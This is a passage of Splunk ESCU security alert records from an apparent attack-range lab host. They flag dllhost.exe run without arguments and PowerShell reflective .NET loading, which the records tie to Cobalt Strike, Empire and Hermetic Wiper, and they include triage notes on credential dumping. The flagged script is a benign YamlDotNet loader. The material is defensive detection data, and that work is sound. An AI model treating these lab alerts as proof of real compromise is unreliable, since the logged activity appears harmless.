with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664982000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664982000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x17c4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664985332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664985332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664985332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664985332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664978400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664978400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4496", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664978400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664978400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1190", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664981733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664981733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664981733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match 